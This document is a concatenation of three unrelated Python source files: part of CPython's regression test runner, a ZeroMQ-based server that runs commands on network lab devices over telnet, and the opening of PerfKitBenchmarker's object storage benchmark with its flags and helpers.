return (id(sysconfig._CONFIG_VARS), sysconfig._CONFIG_VARS,
dict(sysconfig._CONFIG_VARS))
def restore_sysconfig__CONFIG_VARS(self, saved):
sysconfig._CONFIG_VARS = saved[1]
sysconfig._CONFIG_VARS.clear()
sysconfig._CONFIG_VARS.update(saved[2])
def get_sysconfig__INSTALL_SCHEMES(self):
return (id(sysconfig._INSTALL_SCHEMES), sysconfig._INSTALL_SCHEMES,
sysconfig._INSTALL_SCHEMES.copy())
def restore_sysconfig__INSTALL_SCHEMES(self, saved):
sysconfig._INSTALL_SCHEMES = saved[1]
sysconfig._INSTALL_SCHEMES.clear()
sysconfig._INSTALL_SCHEMES.update(saved[2])
def get_files(self):
return sorted(fn + ('/' if os.path.isdir(fn) else '')
for fn in os.listdir())
def restore_files(self, saved_value):
fn = support.TESTFN
if fn not in saved_value and (fn + '/') not in saved_value:
if os.path.isfile(fn):
support.unlink(fn)
elif os.path.isdir(fn):
support.rmtree(fn)
_lc = [getattr(locale, lc) for lc in dir(locale)
if lc.startswith('LC_')]
def get_locale(self):
pairings = []
for lc in self._lc:
try:
pairings.append((lc, locale.setlocale(lc, None)))
except (TypeError, ValueError):
continue
return pairings
def restore_locale(self, saved):
for lc, setting in saved:
locale.setlocale(lc, setting)
def get_warnings_showwarning(self):
return warnings.showwarning
def restore_warnings_showwarning(self, fxn):
warnings.showwarning = fxn
def resource_info(self):
for name in self.resources:
method_suffix = name.replace('.', '_')
get_name = 'get_' + method_suffix
restore_name = 'restore_' + method_suffix
yield name, getattr(self, get_name), getattr(self, restore_name)
def __enter__(self):
self.saved_values = dict((name, get()) for name, get, restore
in self.resource_info())
return self
def __exit__(self, exc_type, exc_val, exc_tb):
saved_values = self.saved_values
del self.saved_values
for name, get, restore in self.resource_info():
current = get()
original = saved_values.pop(name)
# Check for changes to the resource's value
if current != original:
self.changed = True
restore(original)
if not self.quiet:
print("Warning -- {} was modified by {}".format(
name, self.testname),
file=sys.stderr)
if self.verbose > 1:
print(" Before: {}\n After: {} ".format(
original, current),
file=sys.stderr)
return False
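# Hypothetical illustration (not part of the original class): to also track
# sys.dont_write_bytecode, 'sys.dont_write_bytecode' would be listed in the
# 'resources' tuple above and the class would grow this get/restore pair
# (dots become underscores in the method names):
#
#     def get_sys_dont_write_bytecode(self):
#         return sys.dont_write_bytecode
#     def restore_sys_dont_write_bytecode(self, saved):
#         sys.dont_write_bytecode = saved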
def runtest_inner(test, verbose, quiet,
huntrleaks=False, display_failure=True):
support.unload(test)
test_time = 0.0
refleak = False # True if the test leaked references.
try:
if test.startswith('test.'):
abstest = test
else:
# Always import it from the test package
abstest = 'test.' + test
with saved_test_environment(test, verbose, quiet) as environment:
start_time = time.time()
the_module = importlib.import_module(abstest)
# If the test has a test_main, that will run the appropriate
# tests. If not, use normal unittest test loading.
test_runner = getattr(the_module, "test_main", None)
if test_runner is None:
def test_runner():
loader = unittest.TestLoader()
tests = loader.loadTestsFromModule(the_module)
for error in loader.errors:
print(error, file=sys.stderr)
if loader.errors:
raise Exception("errors while loading tests")
support.run_unittest(tests)
test_runner()
if huntrleaks:
refleak = dash_R(the_module, test, test_runner, huntrleaks)
test_time = time.time() - start_time
except support.ResourceDenied as msg:
if not quiet:
print(test, "skipped --", msg)
sys.stdout.flush()
return RESOURCE_DENIED, test_time
except unittest.SkipTest as msg:
if not quiet:
print(test, "skipped --", msg)
sys.stdout.flush()
return SKIPPED, test_time
except KeyboardInterrupt:
raise
except support.TestFailed as msg:
if display_failure:
print("test", test, "failed --", msg, file=sys.stderr)
else:
print("test", test, "failed", file=sys.stderr)
sys.stderr.flush()
return FAILED, test_time
except:
msg = traceback.format_exc()
print("test", test, "crashed --", msg, file=sys.stderr)
sys.stderr.flush()
return FAILED, test_time
else:
if refleak:
return FAILED, test_time
if environment.changed:
return ENV_CHANGED, test_time
return PASSED, test_time
def cleanup_test_droppings(testname, verbose):
import shutil
import stat
import gc
# First kill any dangling references to open files etc.
# This can also issue some ResourceWarnings which would otherwise get
# triggered during the following test run, and possibly produce failures.
gc.collect()
# Try to clean up junk commonly left behind. While tests shouldn't leave
    # any files or directories behind, a failing test may not get the chance to
    # clean up after itself.  The consequences can be especially nasty on Windows,
# since if a test leaves a file open, it cannot be deleted by name (while
# there's nothing we can do about that here either, we can display the
# name of the offending test, which is a real help).
for name in (support.TESTFN,
"db_home",
):
if not os.path.exists(name):
continue
if os.path.isdir(name):
kind, nuker = "directory", shutil.rmtree
elif os.path.isfile(name):
kind, nuker = "file", os.unlink
else:
raise SystemError("os.path says %r exists but is neither "
"directory nor file" % name)
if verbose:
print("%r left behind %s %r" % (testname, kind, name))
try:
# if we have chmod, fix possible permissions problems
# that might prevent cleanup
if (hasattr(os, 'chmod')):
os.chmod(name, stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)
nuker(name)
except Exception as msg:
print(("%r left behind %s %r and it couldn't be "
"removed: %s" % (testname, kind, name, msg)), file=sys.stderr)
def dash_R(the_module, test, indirect_test, huntrleaks):
"""Run a test multiple times, looking for reference leaks.
Returns:
False if the test didn't leak references; True if we detected refleaks.
"""
# This code is hackish and inelegant, but it seems to do the job.
import copyreg
import collections.abc
if not hasattr(sys, 'gettotalrefcount'):
raise Exception("Tracking reference leaks requires a debug build "
"of Python")
# Save current values for dash_R_cleanup() to restore.
fs = warnings.filters[:]
ps = copyreg.dispatch_table.copy()
pic = sys.path_importer_cache.copy()
try:
import zipimport
except ImportError:
zdc = None # Run unmodified on platforms without zipimport support
else:
zdc = zipimport._zip_directory_cache.copy()
abcs = {}
for abc in [getattr(collections.abc, a) for a in collections.abc.__all__]:
if not isabstract(abc):
continue
for obj in abc.__subclasses__() + [abc]:
abcs[obj] = obj._abc_registry.copy()
nwarmup, ntracked, fname = huntrleaks
fname = os.path.join(support.SAVEDCWD, fname)
repcount = nwarmup + ntracked
rc_deltas = [0] * repcount
alloc_deltas = [0] * repcount
print("beginning", repcount, "repetitions", file=sys.stderr)
print(("1234567890"*(repcount//10 + 1))[:repcount], file=sys.stderr)
sys.stderr.flush()
for i in range(repcount):
indirect_test()
alloc_after, rc_after = dash_R_cleanup(fs, ps, pic, zdc, abcs)
sys.stderr.write('.')
sys.stderr.flush()
if i >= nwarmup:
rc_deltas[i] = rc_after - rc_before
alloc_deltas[i] = alloc_after - alloc_before
alloc_before, rc_before = alloc_after, rc_after
print(file=sys.stderr)
# These checkers return False on success, True on failure
def check_rc_deltas(deltas):
return any(deltas)
def check_alloc_deltas(deltas):
# At least 1/3rd of 0s
if 3 * deltas.count(0) < len(deltas):
return True
        # Nothing other than 1s, 0s and -1s
if not set(deltas) <= {1,0,-1}:
return True
return False
failed = False
for deltas, item_name, checker in [
(rc_deltas, 'references', check_rc_deltas),
(alloc_deltas, 'memory blocks', check_alloc_deltas)]:
if checker(deltas):
msg = '%s leaked %s %s, sum=%s' % (
test, deltas[nwarmup:], item_name, sum(deltas))
print(msg, file=sys.stderr)
sys.stderr.flush()
with open(fname, "a") as refrep:
print(msg, file=refrep)
refrep.flush()
failed = True
return failed
def dash_R_cleanup(fs, ps, pic, zdc, abcs):
import gc, copyreg
import _strptime, linecache
import urllib.parse, urllib.request, mimetypes, doctest
import struct, filecmp, collections.abc
from distutils.dir_util import _path_created
from weakref import WeakSet
# Clear the warnings registry, so they can be displayed again
for mod in sys.modules.values():
if hasattr(mod, '__warningregistry__'):
del mod.__warningregistry__
# Restore some original values.
warnings.filters[:] = fs
copyreg.dispatch_table.clear()
copyreg.dispatch_table.update(ps)
sys.path_importer_cache.clear()
sys.path_importer_cache.update(pic)
try:
import zipimport
except ImportError:
pass # Run unmodified on platforms without zipimport support
else:
zipimport._zip_directory_cache.clear()
zipimport._zip_directory_cache.update(zdc)
# clear type cache
sys._clear_type_cache()
# Clear ABC registries, restoring previously saved ABC registries.
for abc in [getattr(collections.abc, a) for a in collections.abc.__all__]:
if not isabstract(abc):
continue
for obj in abc.__subclasses__() + [abc]:
obj._abc_registry = abcs.get(obj, WeakSet()).copy()
obj._abc_cache.clear()
obj._abc_negative_cache.clear()
# Flush standard output, so that buffered data is sent to the OS and
# associated Python objects are reclaimed.
for stream in (sys.stdout, sys.stderr, sys.__stdout__, sys.__stderr__):
if stream is not None:
stream.flush()
# Clear assorted module caches.
_path_created.clear()
re.purge()
_strptime._regex_cache.clear()
urllib.parse.clear_cache()
urllib.request.urlcleanup()
linecache.clearcache()
mimetypes._default_mime_types()
filecmp._cache.clear()
struct._clearcache()
doctest.master = None
try:
import ctypes
except ImportError:
# Don't worry about resetting the cache if ctypes is not supported
pass
else:
ctypes._reset_cache()
# Collect cyclic trash and read memory statistics immediately after.
func1 = sys.getallocatedblocks
func2 = sys.gettotalrefcount
gc.collect()
return func1(), func2()
def warm_caches():
# char cache
s = bytes(range(256))
for i in range(256):
s[i:i+1]
# unicode cache
x = [chr(i) for i in range(256)]
# int cache
x = list(range(-5, 257))
def findtestdir(path=None):
return path or os.path.dirname(__file__) or os.curdir
def removepy(names):
if not names:
return
for idx, name in enumerate(names):
basename, ext = os.path.splitext(name)
if ext == '.py':
names[idx] = basename
def count(n, word):
if n == 1:
return "%d %s" % (n, word)
else:
return "%d %ss" % (n, word)
def printlist(x, width=70, indent=4):
"""Print the elements of iterable x to stdout.
Optional arg width (default 70) is the maximum line length.
Optional arg indent (default 4) is the number of blanks with which to
begin each line.
"""
from textwrap import fill
blanks = ' ' * indent
# Print the sorted list: 'x' may be a '--random' list or a set()
print(fill(' '.join(str(elt) for elt in sorted(x)), width,
initial_indent=blanks, subsequent_indent=blanks))
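# For example, printlist(['b', 'a', 'c']) prints '    a b c' (sorted, indented
# by four blanks and wrapped at 70 columns).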
def main_in_temp_cwd():
"""Run main() in a temporary working directory."""
if sysconfig.is_python_build():
try:
os.mkdir(TEMPDIR)
except FileExistsError:
pass
# Define a writable temp dir that will be used as cwd while running
# the tests. The name of the dir includes the pid to allow parallel
# testing (see the -j option).
test_cwd = 'test_python_{}'.format(os.getpid())
test_cwd = os.path.join(TEMPDIR, test_cwd)
# Run the tests in a context manager that temporarily changes the CWD to a
# temporary and writable directory. If it's not possible to create or
# change the CWD, the original CWD will be used. The original CWD is
# available from support.SAVEDCWD.
with support.temp_cwd(test_cwd, quiet=True):
main()
if __name__ == '__main__':
# Remove regrtest.py's own directory from the module search path. Despite
# the elimination of implicit relative imports, this is still needed to
# ensure that submodules of the test package do not inappropriately appear
# as top-level modules even when people (or buildbots!) invoke regrtest.py
# directly instead of using the -m switch
mydir = os.path.abspath(os.path.normpath(os.path.dirname(sys.argv[0])))
i = len(sys.path)
while i >= 0:
i -= 1
if os.path.abspath(os.path.normpath(sys.path[i])) == mydir:
del sys.path[i]
# findtestdir() gets the dirname out of __file__, so we have to make it
# absolute before changing the working directory.
# For example __file__ may be relative when running trace or profile.
# See issue #9323.
__file__ = os.path.abspath(__file__)
# sanity check
assert __file__ == os.path.abspath(sys.argv[0])
main_in_temp_cwd()
|
server.py
|
"""Zmq based measurement server"""
# based on https://learning-0mq-with-pyzmq.readthedocs.org/en/latest/pyzmq/patterns/pushpull.html
import zmq
import json
import socket as python_socket
import telnetlib
from threading import Thread
import time
import sys
def streamer_device(port_in, port_out):
from zmq.devices import ProcessDevice
    pd = ProcessDevice(zmq.STREAMER, zmq.PULL, zmq.PUSH)
pd.bind_in('tcp://*:%s' % port_in)
pd.bind_out('tcp://*:%s' % port_out)
pd.setsockopt_in(zmq.IDENTITY, 'PULL')
pd.setsockopt_out(zmq.IDENTITY, 'PUSH')
pd.start()
# it will now be running in a background process
def forwarder_device(port_in, port_out):
from zmq.devices import ProcessDevice
pd = ProcessDevice(zmq.FORWARDER, zmq.SUB, zmq.PUB)
pd.bind_in('tcp://*:%s' % port_in)
pd.bind_out('tcp://*:%s' % port_out)
pd.setsockopt_in(zmq.IDENTITY, 'SUB')
pd.setsockopt_in(zmq.SUBSCRIBE, "")
pd.setsockopt_out(zmq.IDENTITY, 'PUB')
pd.start()
# it will now be running in a background process
CONNECTORS = {}
#TODO: inherit from base autonetkit connector abstract function
def netkit_connector(host, username, password, command, *args, **kwargs):
#Note: user prompt and priv prompt have same password
vtysh = kwargs.get("vtysh", False)
print host, username, password, command, vtysh
print "Connecting to %s" % (host)
try:
tn = telnetlib.Telnet(host, timeout = 10)
except Exception, e:
print "Unable to connect to %s: %s" % (host, e)
return
tn.set_debuglevel(0)
print "Connected to %s" % host
welcome_banner = tn.read_until("login:", timeout = 10)
last_line = welcome_banner.splitlines()[-1]
hostname = last_line.replace("login:", "").strip()
linux_prompt = hostname + ":~#"
print "Hostname is %s" % hostname
    #TODO: check why the string handling below is needed for ascii/unicode with pyzmq
tn.write(username + '\n')
tn.read_until("Password:", timeout = 10)
tn.write(password + '\n')
tn.read_until(linux_prompt, timeout = 10)
if vtysh:
vtysh_prompt = hostname + "#"
tn.write("vtysh" + "\n")
tn.read_until(vtysh_prompt, timeout = 10)
tn.write("terminal length 0" + "\n")
tn.read_until(vtysh_prompt, timeout = 10)
tn.write(command + "\n")
result = tn.read_until(vtysh_prompt, timeout = 10)
tn.write("exit" + "\n")
#TODO: check if need to parse result also to strip out prompt
else:
tn.write(command + "\n")
result = tn.read_until(linux_prompt, timeout = 10)
result = "\n".join(result.splitlines()[1:-1])
print "Finished for %s" % hostname
tn.write("exit" + "\n")
return hostname, result
CONNECTORS['netkit'] = netkit_connector
try:
import autonetkit_cisco
import autonetkit_cisco.measure_connectors
except ImportError:
pass # not installed
else:
CONNECTORS['iosv_ns'] = autonetkit_cisco.measure_connectors.iosv_ns_connector
CONNECTORS['csr1000v_ns'] = autonetkit_cisco.measure_connectors.iosv_ns_connector
CONNECTORS['ios_xrv_ns'] = autonetkit_cisco.measure_connectors.ios_xrv_ns_connector
CONNECTORS['nx_osv_ns'] = autonetkit_cisco.measure_connectors.nx_osv_ns_connector
CONNECTORS['ubuntu_ns'] = autonetkit_cisco.measure_connectors.linux_ns_connector
def do_connect(**kwargs):
#TODO: use a function map
connector = kwargs.get("connector")
connector_fn = CONNECTORS[connector] #TODO: capture if not found
try:
return connector_fn(**kwargs)
except EOFError:
print "Unable to connect with connector %s" % connector
return ""
def worker():
context = zmq.Context()
    # receive work
consumer_receiver = context.socket(zmq.PULL)
consumer_receiver.connect("tcp://127.0.0.1:5560")
# send work
consumer_sender = context.socket(zmq.PUB)
consumer_sender.connect("tcp://127.0.0.1:5561")
while True:
# Wait for next request from client
print "Waiting for message"
work = consumer_receiver.recv_json()
#socket.send(json.dumps("hello"))
#continue
print "Received request: ", work
data = json.loads(work)
host = data['host'] #TODO: rename this to host_ip
#TODO: add support for host port (default 23)
connector = data['connector']
username = data['username']
password = data['password']
command = data['command']
message_key = data['message_key']
vtysh = data.get('vtysh', False)
message_key = str(message_key)
username = str(username)
password = str(password)
command = str(command)
print "command is", command
data = {k: str(v) for k, v in data.items()}
try:
hostname, result = do_connect(**data)
success = True
except Exception, e:
print e
hostname = ""
success = False
result = str(e)
if "No route to host" in e:
# simpler message
result = "No route to host"
if "pexpect.TIMEOUT" in str(e):
#TODO: test for timeout exception directly
result = "Pexpect timeout"
finally:
try:
data = str(data)
hostname = str(hostname)
result = str(result)
message = json.dumps({'command': work,
"success": success,
'hostname': hostname,
'result': result})
except Exception, e:
print "cant dump", e
else:
consumer_sender.send("%s %s" % (message_key, message))
print "Sent to zmq"
def main():
num_worker_threads = 5
try:
num_worker_threads = int(sys.argv[1])
except IndexError:
pass
#NOTE: need pts/x available for worst-case of all threads at once
for i in range(num_worker_threads):
t = Thread(target=worker)
t.daemon = True
t.start()
# start the streamer device
streamer_device(5559, 5560)
forwarder_device(5561, 5562)
while True:
time.sleep(1)
if __name__ == "__main__":
main()
|
object_storage_service_benchmark.py
|
# Copyright 2016 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Object (blob) Storage benchmark tests.
There are two categories of tests here: 1) tests based on CLI tools, and 2)
tests that use APIs to access storage provider.
For 1), we aim to simulate a typical use case of a common user of a storage
provider: uploading and downloading a set of files of different sizes to/from a
local directory.
For 2), we aim to measure the performance of a storage provider more directly
by accessing it via APIs. Here are the main scenarios covered in this
category:
a: Single byte object upload and download, measures latency.
b: List-after-write and list-after-update consistency measurement.
c: Single stream large object upload and download, measures throughput.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import datetime
import enum
import glob
import json
import logging
import os
import posixpath
import re
import threading
import time
import uuid
from absl import flags
import numpy as np
from perfkitbenchmarker import configs
from perfkitbenchmarker import data
from perfkitbenchmarker import errors
from perfkitbenchmarker import flag_util
from perfkitbenchmarker import object_storage_service
from perfkitbenchmarker import providers
from perfkitbenchmarker import sample
from perfkitbenchmarker import units
from perfkitbenchmarker import vm_util
from perfkitbenchmarker.providers.gcp import gcs
from perfkitbenchmarker.sample import PercentileCalculator # noqa
import six
from six.moves import range
from six.moves import zip
flags.DEFINE_enum('storage', providers.GCP,
[providers.GCP, providers.AWS,
providers.AZURE, providers.OPENSTACK],
'storage provider (GCP/AZURE/AWS/OPENSTACK) to use.')
flags.DEFINE_string('object_storage_region', None,
'Storage region for object storage benchmark.')
flags.DEFINE_string('object_storage_gcs_multiregion', None,
'Storage multiregion for GCS in object storage benchmark.')
flags.DEFINE_string('object_storage_storage_class', None,
'Storage class to use in object storage benchmark.')
flags.DEFINE_enum('object_storage_scenario', 'all',
['all', 'cli', 'api_data', 'api_namespace',
'api_multistream', 'api_multistream_writes',
'api_multistream_reads'],
'select all, or one particular scenario to run: \n'
'ALL: runs all scenarios. This is the default. \n'
'cli: runs the command line only scenario. \n'
'api_data: runs API based benchmarking for data paths. \n'
'api_namespace: runs API based benchmarking for namespace '
'operations. \n'
'api_multistream: runs API-based benchmarking with multiple '
'upload/download streams.\n'
                  'api_multistream_writes: runs API-based benchmarking with '
                  'multiple upload streams.\n'
                  'api_multistream_reads: runs API-based benchmarking with '
                  'multiple download streams.')
flags.DEFINE_string('object_storage_bucket_name', None,
'If set, the bucket will be created with this name')
flags.DEFINE_boolean('object_storage_apply_region_suffix_to_bucket_name', False,
'If set, the region will be appended to the bucket name.')
flags.DEFINE_enum('cli_test_size', 'normal',
['normal', 'large'],
'size of the cli tests. Normal means a mixture of various \n'
'object sizes up to 32MiB (see '
'data/cloud-storage-workload.sh). \n'
'Large means all objects are of at least 1GiB.')
flags.DEFINE_integer('object_storage_multistream_objects_per_stream', 1000,
'Number of objects to send and/or receive per stream. '
'Only applies to the api_multistream scenario.',
lower_bound=1)
flag_util.DEFINE_yaml('object_storage_object_sizes', '1KB',
'Size of objects to send and/or receive. Only applies to '
'the api_multistream scenario. Examples: 1KB, '
'{1KB: 50%, 10KB: 50%}')
flags.DEFINE_integer('object_storage_streams_per_vm', 10,
'Number of independent streams per VM. Only applies to '
'the api_multistream scenario.',
lower_bound=1)
flags.DEFINE_integer('object_storage_list_consistency_iterations', 200,
'Number of iterations to perform for the api_namespace '
'list consistency benchmark. This flag is mainly for '
'regression testing in the benchmarks. Reduce the number '
'to shorten the execution time of the api_namespace '
'scenario. However, to get useful metrics from the '
'api_namespace scenario, a high number of iterations '
'should be used (>=200).')
flags.DEFINE_enum('object_storage_object_naming_scheme', 'sequential_by_stream',
['sequential_by_stream',
'approximately_sequential'],
'How objects will be named. Only applies to the '
'api_multistream benchmark. '
'sequential_by_stream: object names from each stream '
'will be sequential, but different streams will have '
'different name prefixes. '
'approximately_sequential: object names from all '
'streams will roughly increase together.')
flags.DEFINE_string('object_storage_objects_written_file_prefix', None,
'If specified, the bucket and all of the objects will not '
'be deleted, and the list of object names will be written '
'to a file with the specified prefix in the following '
'format: <bucket>/<object>. This prefix can be passed to '
                    'this benchmark in a later run via the '
'object_storage_read_objects_prefix flag. Only valid for '
'the api_multistream and api_multistream_writes scenarios. '
'The filename is appended with the date and time so that '
'later runs can be given a prefix and a minimum age of '
'objects. The later run will then use the oldest objects '
'available or fail if there is no file with an old enough '
'date. The prefix is also appended with the region so that '
'later runs will read objects from the same region.')
flags.DEFINE_string('object_storage_read_objects_prefix', None,
'If specified, no new bucket or objects will be created. '
'Instead, the benchmark will read the objects listed in '
'a file with the specified prefix that was written some '
                    'number of hours before (as specified by '
'object_storage_read_objects_min_hours). Only valid for '
'the api_multistream_reads scenario.')
flags.DEFINE_integer('object_storage_read_objects_min_hours', 72, 'The minimum '
'number of hours from which to read objects that were '
'written on a previous run. Used in combination with '
'object_storage_read_objects_prefix.')
flags.DEFINE_boolean('object_storage_dont_delete_bucket', False,
'If True, the storage bucket won\'t be deleted. Useful '
'for running the api_multistream_reads scenario multiple '
'times against the same objects.')
flags.DEFINE_string('object_storage_worker_output', None,
                    'If set, the worker threads\' output will be written to the '
'path provided.')
flags.DEFINE_float('object_storage_latency_histogram_interval', None,
'If set, a latency histogram sample will be created with '
'buckets of the specified interval in seconds. Individual '
'histogram samples are created for each different object '
'size in the distribution, because it is easy to aggregate '
'the histograms during post-processing, but impossible to '
'go in the opposite direction.')
flags.DEFINE_boolean(
'record_individual_latency_samples', False,
'If set, record the latency of each download and upload '
'in its own sample.')
flags.DEFINE_boolean(
'object_storage_bulk_delete', False,
'If true, deletes objects with bulk delete client request and records '
'average latency per object. Otherwise, deletes one object per request '
'and records individual delete latency'
)
FLAGS = flags.FLAGS
BENCHMARK_INFO = {'name': 'object_storage_service',
'description':
'Object/blob storage service benchmarks. Specify '
'--object_storage_scenario '
'to select a set of sub-benchmarks to run. default is all.',
'scratch_disk': False,
'num_machines': 1}
BENCHMARK_NAME = 'object_storage_service'
BENCHMARK_CONFIG = """
object_storage_service:
description: >
Object/blob storage service benchmarks. Specify
--object_storage_scenario
to select a set of sub-benchmarks to run. default is all.
vm_groups:
default:
vm_spec: *default_single_core
vm_count: null
flags:
gcloud_scopes: https://www.googleapis.com/auth/devstorage.read_write
"""
DATA_FILE = 'cloud-storage-workload.sh'
# size of all data used in the CLI tests.
DATA_SIZE_IN_BYTES = 256.1 * 1024 * 1024
DATA_SIZE_IN_MBITS = 8 * DATA_SIZE_IN_BYTES / 1000 / 1000
LARGE_DATA_SIZE_IN_BYTES = 3 * 1024 * 1024 * 1024
LARGE_DATA_SIZE_IN_MBITS = 8 * LARGE_DATA_SIZE_IN_BYTES / 1000 / 1000
API_TEST_SCRIPT = 'object_storage_api_tests.py'
API_TEST_SCRIPTS_DIR = 'object_storage_api_test_scripts'
# Files that will be sent to the remote VM as a package for API test script.
API_TEST_SCRIPT_PACKAGE_FILES = [
'__init__.py', 'object_storage_interface.py', 'azure_flags.py',
'gcs_flags.py', 's3_flags.py'
]
SCRIPT_DIR = '/tmp/run'
REMOTE_PACKAGE_DIR = posixpath.join(SCRIPT_DIR, 'providers')
DOWNLOAD_DIRECTORY = posixpath.join(SCRIPT_DIR, 'temp')
# Various constants to name the result metrics.
THROUGHPUT_UNIT = 'Mbps'
LATENCY_UNIT = 'seconds'
NA_UNIT = 'na'
PERCENTILES_LIST = ['p0.1', 'p1', 'p5', 'p10', 'p50', 'p90', 'p95', 'p99',
'p99.9', 'average', 'stddev']
UPLOAD_THROUGHPUT_VIA_CLI = 'upload throughput via cli Mbps'
DOWNLOAD_THROUGHPUT_VIA_CLI = 'download throughput via cli Mbps'
CLI_TEST_ITERATION_COUNT = 100
LARGE_CLI_TEST_ITERATION_COUNT = 20
CLI_TEST_FAILURE_TOLERANCE = 0.05
# Azure does not parallelize operations in its CLI tools. We have to
# do the uploads or downloads of 100 test files sequentially; since each
# iteration takes a very long time, we run only 3 iterations.
SINGLE_STREAM_THROUGHPUT = 'single stream %s throughput Mbps'
ONE_BYTE_LATENCY = 'one byte %s latency'
LIST_CONSISTENCY_SCENARIOS = ['list-after-write', 'list-after-update']
LIST_CONSISTENCY_PERCENTAGE = 'consistency percentage'
LIST_INCONSISTENCY_WINDOW = 'inconsistency window'
LIST_LATENCY = 'latency'
CONTENT_REMOVAL_RETRY_LIMIT = 5
# Sometimes, even when a bucket is completely empty, the service provider
# refuses to remove the bucket with a "BucketNotEmpty" error for up to 1 hour.
# We keep retrying until we reach the one-hour limit, and this wait is
# necessary for some providers.
BUCKET_REMOVAL_RETRY_LIMIT = 120
RETRY_WAIT_INTERVAL_SECONDS = 30
# GCS has special region handling until we can remove it :(
DEFAULT_GCS_MULTIREGION = 'us'
# Keys for flag names and metadata values
OBJECT_STORAGE_REGION = 'object_storage_region'
REGIONAL_BUCKET_LOCATION = 'regional_bucket_location'
OBJECT_STORAGE_GCS_MULTIREGION = 'object_storage_gcs_multiregion'
GCS_MULTIREGION_LOCATION = 'gcs_multiregion_location'
DEFAULT = 'default'
# This accounts for the overhead of running RemoteCommand() on a VM.
MULTISTREAM_DELAY_PER_VM = 5.0 * units.second
# We wait this long for each stream. Note that this is multiplied by
# the number of streams per VM, not the total number of streams.
MULTISTREAM_DELAY_PER_STREAM = 0.1 * units.second
# And add a constant factor for PKB-side processing
MULTISTREAM_DELAY_CONSTANT = 10.0 * units.second
# Max number of delete operations per second
MULTISTREAM_DELETE_OPS_PER_SEC = 3500
# The multistream write benchmark writes a file in the VM's /tmp with
# the objects it has written, which is used by the multistream read
# benchmark. This is the filename.
OBJECTS_WRITTEN_FILE = 'pkb-objects-written'
# If the gap between different stream starts and ends is above a
# certain proportion of the total time, we log a warning because we
# are throwing out a lot of information. We also put the warning in
# the sample metadata.
MULTISTREAM_STREAM_GAP_THRESHOLD = 0.2
# The API test script uses different names for providers than this
# script :(
STORAGE_TO_API_SCRIPT_DICT = {
providers.GCP: 'GCS',
providers.AWS: 'S3',
providers.AZURE: 'AZURE'}
_SECONDS_PER_HOUR = 60 * 60
class MultistreamOperationType(enum.Enum):
"""MultiStream Operations supported by object_storage_api_tests script."""
download = 1
upload = 2
delete = 3
bulk_delete = 4
def GetConfig(user_config):
return configs.LoadConfig(BENCHMARK_CONFIG, user_config, BENCHMARK_NAME)
# Raised when we fail to remove a bucket or its content after many retries.
# TODO: add a new class of error "ObjectStorageError" to errors.py and remove
# this one.
class BucketRemovalError(Exception):
pass
class NotEnoughResultsError(Exception):
pass
class ColdDataError(Exception):
"""Exception indicating that the cold object data does not exist."""
def _JsonStringToPercentileResults(results, json_input, metric_name,
metric_unit, metadata):
"""This function parses a percentile result string in Json format.
Args:
results: The final result set to put result in.
json_input: The input in Json format about percentiles.
metric_name: Name of the metric.
metric_unit: Unit of the metric.
metadata: The metadata to be included.
"""
result = json.loads(json_input)
for percentile in PERCENTILES_LIST:
results.append(sample.Sample(
('%s %s') % (metric_name, percentile),
float(result[percentile]),
metric_unit,
metadata))
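# Illustrative only: the expected json_input is a JSON object keyed by the
# entries of PERCENTILES_LIST (values here are made up), e.g.
#   '{"p0.1": 0.010, "p50": 0.015, "p99.9": 0.042, "average": 0.017, ...}'
# Each key produces one sample named '<metric_name> <percentile>'.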
def _GetClientLibVersion(vm, library_name):
"""This function returns the version of client lib installed on a vm.
Args:
vm: the VM to get the client lib version from.
library_name: the name of the client lib.
Returns:
The version string of the client.
"""
version, _ = vm.RemoteCommand('pip3 show %s |grep Version' % library_name)
logging.info('%s client lib version is: %s', library_name, version)
return version
def MultiThreadStartDelay(num_vms, threads_per_vm):
"""Find how long in the future we can simultaneously start threads on VMs.
Args:
num_vms: number of VMs to start threads on.
threads_per_vm: number of threads to start on each VM.
Returns:
A units.Quantity of time such that if we want to start
threads_per_vm threads on num_vms VMs, we can start the threads
sequentially, tell each of them to sleep for this number of
seconds, and we expect that we will be able to start the last
thread before the delay has finished.
"""
return (
MULTISTREAM_DELAY_CONSTANT +
MULTISTREAM_DELAY_PER_VM * num_vms +
MULTISTREAM_DELAY_PER_STREAM * threads_per_vm)
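# Worked example, purely illustrative, using the constants defined above:
# with num_vms=2 and threads_per_vm=10, the returned delay is
# 10.0 s + 5.0 s * 2 + 0.1 s * 10 = 21.0 seconds.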
def MultiThreadDeleteDelay(num_vms, threads_per_vm):
"""Calculates delay time between delete operation.
Args:
num_vms: number of VMs to start threads on.
threads_per_vm: number of threads to start on each VM.
Returns:
float. Delay time in seconds based on number of vms and threads and the
maximum number of delete operations per second.
"""
return (num_vms * threads_per_vm) / (MULTISTREAM_DELETE_OPS_PER_SEC)
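# Illustrative example: with num_vms=2 and threads_per_vm=10, the delay is
# (2 * 10) / 3500 ~= 0.0057 seconds.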
def _ProcessMultiStreamResults(start_times, latencies, sizes, operation,
all_sizes, results, metadata=None):
"""Read and process results from the api_multistream worker process.
Results will be reported per-object size and combined for all
objects.
Args:
start_times: a list of numpy arrays. Operation start times, as
POSIX timestamps.
latencies: a list of numpy arrays. Operation durations, in seconds.
sizes: a list of numpy arrays. Object sizes used in each
operation, in bytes.
    operation: the name of the MultistreamOperationType the results are from,
      e.g. 'upload' or 'download'.
all_sizes: a sequence of integers. all object sizes in the
distribution used, in bytes.
results: a list to append Sample objects to.
metadata: dict. Base sample metadata
"""
num_streams = FLAGS.object_storage_streams_per_vm * FLAGS.num_vms
assert len(start_times) == num_streams
assert len(latencies) == num_streams
assert len(sizes) == num_streams
if metadata is None:
metadata = {}
metadata['num_streams'] = num_streams
metadata['objects_per_stream'] = (
FLAGS.object_storage_multistream_objects_per_stream)
metadata['object_naming'] = FLAGS.object_storage_object_naming_scheme
min_num_records = min((len(start_time) for start_time in start_times))
num_records = sum((len(start_time) for start_time in start_times))
logging.info('Processing %s total operation records', num_records)
stop_times = [start_time + latency
